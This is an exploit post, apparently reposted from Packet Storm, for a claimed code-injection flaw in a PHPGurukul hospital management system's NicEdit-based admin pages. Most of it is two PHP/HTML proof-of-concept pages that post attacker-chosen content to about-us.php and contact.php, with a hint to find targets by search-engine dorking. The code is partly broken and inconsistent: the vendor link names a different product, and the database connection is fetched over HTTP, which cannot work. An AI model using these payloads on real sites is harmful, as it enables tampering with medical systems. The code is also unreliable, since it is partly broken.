Share
## https://sploitus.com/exploit?id=PACKETSTORM:180246
=============================================================================================================================================  
| # Title : Hospital Management System 1.0(WYSIWYG) code injection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |  
| # Vendor : https://phpgurukul.com/wp-content/uploads/2017/12/Hostel-Management-Syste-Updated-Code.zip |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking İn Google Or Other Search Enggine.  
  
[+] Part 01 : about-us.php  
  
[+] This payload injects code of your choice into the database via NicEdit is a WYSIWYG editor V: 0.9 r25 which is called inside the file /hms/admin/about-us.php .   
  
[+] Line 2 : Make sure to include your database connection here  
  
[+] Line 44 : Send the form data using fetch API (Set your target url)  
  
[+] save payload as poc.php in your localhost path .  
  
[+] payload :   
  
<?php  
include('http://127.0.0.1/hospital/hms/admin/include/config.php'); // Make sure to include your database connection here  
  
if (isset($_POST['submit'])) {  
$pagetitle = $_POST['pagetitle'];  
$pagedes = $con->real_escape_string($_POST['pagedes']);  
$query = mysqli_query($con, "UPDATE tblpage SET PageTitle='$pagetitle', PageDescription='$pagedes' WHERE PageType='aboutus'");  
  
if ($query) {  
echo '<script>alert("About Us has been updated.")</script>';  
} else {  
echo '<script>alert("Something Went Wrong. Please try again.")</script>';  
}  
exit;  
}  
?>  
  
<!DOCTYPE html>  
<html lang="en">  
<head>  
<meta charset="UTF-8">  
<meta name="viewport" content="width=device-width, initial-scale=1.0">  
<title>indoushka | Update About Us Content</title>  
<!-- NicEdit Script -->  
<script src="http://js.nicedit.com/nicEdit-latest.js" type="text/javascript"></script>  
<script type="text/javascript">  
// Apply NicEdit to all text areas when the DOM is loaded  
bkLib.onDomLoaded(nicEditors.allTextAreas);  
  
// Function to handle form submission using JavaScript  
function submitForm(event) {  
event.preventDefault(); // Prevent default form submission  
  
const pagetitle = document.getElementById('pagetitle').value;  
const pagedes = nicEditors.findEditor('pagedes').getContent(); // Get the NicEdit content  
  
// Prepare the form data to be sent  
const formData = new FormData();  
formData.append('pagetitle', pagetitle);  
formData.append('pagedes', pagedes);  
formData.append('submit', true);  
  
// Send the form data using fetch API  
fetch('http://127.0.0.1/hospital/hms/admin/about-us.php', {  
method: 'POST',  
body: formData,  
})  
.then(response => response.text())  
.then(data => {  
alert('About Us content has been updated successfully.');  
console.log(data); // Handle the response from the server  
})  
.catch(error => {  
console.error('Error:', error);  
});  
}  
</script>  
<style>  
/* Center the form container */  
.editor-container {  
max-width: 800px;  
margin: 0 auto; /* Center horizontally */  
padding: 20px;  
text-align: center; /* Center the content inside */  
}  
  
/* Ensure the textarea takes the full width */  
#pagedes {  
width: 100%;  
height: 300px;  
margin: 0 auto;  
}  
</style>  
</head>  
<body>  
<div id="app">  
<div class="app-content">  
<div class="main-content">  
<div class="wrap-content container" id="container">  
<!-- Page Title Section -->  
<section id="page-title">  
<div class="row">  
<div class="col-sm-8">  
<h1 class="mainTitle">Update the About Us Content</h1>  
</div>  
  
</li>  
</ol>  
</div>  
</section>  
<!-- Form Section -->  
<div class="container-fluid container-fullw bg-white">  
<div class="row">  
<div class="col-md-12">  
<!-- Centering the form using a wrapper div -->  
<div class="editor-container">  
<form class="forms-sample" method="post" onsubmit="submitForm(event);">  
<div class="form-group">  
<label for="pagetitle">Page Title</label>  
<input id="pagetitle" name="pagetitle" type="text" class="form-control" required>  
</div>  
<div class="form-group">  
<label for="pagedes">Page Description</label>  
<!-- NicEdit will enhance this textarea -->  
<textarea class="form-control" name="pagedes" id="pagedes" rows="12"></textarea>  
</div>  
<button type="submit" class="btn btn-primary mr-2" name="submit">Submit</button>  
</form>  
</div>  
</div>  
</div>  
</div>  
<!-- End Form Section -->  
</div>  
</div>  
</div>  
</div>  
<!-- Footer -->  
</body>  
</html>  
  
---------------------- [+] Part 02 : contact.php [+] --------------------  
  
[+] Line 4 : Make sure to include your database connection here  
  
[+] Line 60 : Send the form data using fetch API (Set your target url)  
  
[+] save payload as poc.php in your localhost path .  
  
[+] payload :   
  
<?php  
  
// عنوان الخادم الخارجي  
$url = 'http://127.0.0.1/hospital/hms/admin/include/config.php';  
  
// جلب البيانات من الخادم الخارجي  
$response = file_get_contents($url);  
  
// التحقق من وجود البيانات  
if ($response !== FALSE) {  
// التعامل مع البيانات  
echo $response;  
} else {  
echo 'حدث خطأ أثناء جلب البيانات.';  
}  
  
if (isset($_POST['submit'])) {  
$pagetitle = $_POST['pagetitle'];  
$pagedes = $con->real_escape_string($_POST['pagedes']);  
$email = $con->real_escape_string($_POST['email']);  
$mobnum = $con->real_escape_string($_POST['mobnum']);  
  
$query = mysqli_query($con, "UPDATE tblpage SET PageTitle='$pagetitle', PageDescription='$pagedes', Email='$email', MobileNumber='$mobnum' WHERE PageType='contactus'");  
  
if ($query) {  
echo '<script>alert("Contact Us has been updated.")</script>';  
} else {  
echo '<script>alert("Something Went Wrong. Please try again.")</script>';  
}  
exit;  
}  
  
?>  
<!DOCTYPE html>  
<html lang="en">  
<head>  
<meta charset="UTF-8">  
<meta name="viewport" content="width=device-width, initial-scale=1.0">  
<title>Admin | Update Contact Us Content</title>  
<!-- NicEdit Script -->  
<script src="http://js.nicedit.com/nicEdit-latest.js" type="text/javascript"></script>  
<script type="text/javascript">  
bkLib.onDomLoaded(nicEditors.allTextAreas);  
  
function submitForm(event) {  
event.preventDefault();  
  
const pagetitle = document.getElementById('pagetitle').value;  
const pagedes = nicEditors.findEditor('pagedes').getContent();  
const email = document.getElementById('email').value;  
const mobnum = document.getElementById('mobnum').value;  
  
const formData = new FormData();  
formData.append('pagetitle', pagetitle);  
formData.append('pagedes', pagedes);  
formData.append('email', email);  
formData.append('mobnum', mobnum);  
formData.append('submit', true);  
  
fetch('http://127.0.0.1/hospital/hms/admin/contact.php', {  
method: 'POST',  
body: formData,  
})  
.then(response => response.text())  
.then(data => {  
alert('Contact Us content has been updated successfully.');  
console.log(data);  
})  
.catch(error => {  
console.error('Error:', error);  
});  
}  
</script>  
<style>  
.editor-container {  
max-width: 800px;  
margin: 0 auto;  
padding: 20px;  
text-align: center;  
}  
  
#pagedes {  
width: 100%;  
height: 300px;  
margin: 0 auto;  
}  
</style>  
</head>  
<body>  
<div id="app">  
<div class="app-content">  
<div class="main-content">  
<div class="wrap-content container" id="container">  
<section id="page-title">  
<div class="row">  
<div class="col-sm-8">  
<h1 class="mainTitle">Admin | Update Contact Us Content</h1>  
</div>  
<ol class="breadcrumb">  
<li class="active">  
<span>Update Contact Us Content</span>  
</li>  
</ol>  
</div>  
</section>  
<div class="container-fluid container-fullw bg-white">  
<div class="row">  
<div class="col-md-12">  
<div class="editor-container">  
<form class="forms-sample" method="post" onsubmit="submitForm(event);">  
<div class="form-group">  
<label for="pagetitle">Page Title</label>  
<input id="pagetitle" name="pagetitle" type="text" class="form-control" required>  
</div>  
<div class="form-group">  
<label for="pagedes">Page Description</label>  
<textarea class="form-control" name="pagedes" id="pagedes" rows="12"></textarea>  
</div>  
<div class="form-group">  
<label for="email">Email</label>  
<input id="email" name="email" type="email" class="form-control" required>  
</div>  
<div class="form-group">  
<label for="mobnum">Mobile Number</label>  
<input id="mobnum" name="mobnum" type="text" class="form-control" required>  
</div>  
<button type="submit" class="btn btn-primary mr-2" name="submit">Submit</button>  
</form>  
</div>  
</div>  
</div>  
</div>  
</div>  
</div>  
</div>  
</div>  
</body>  
</html>  
  
  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================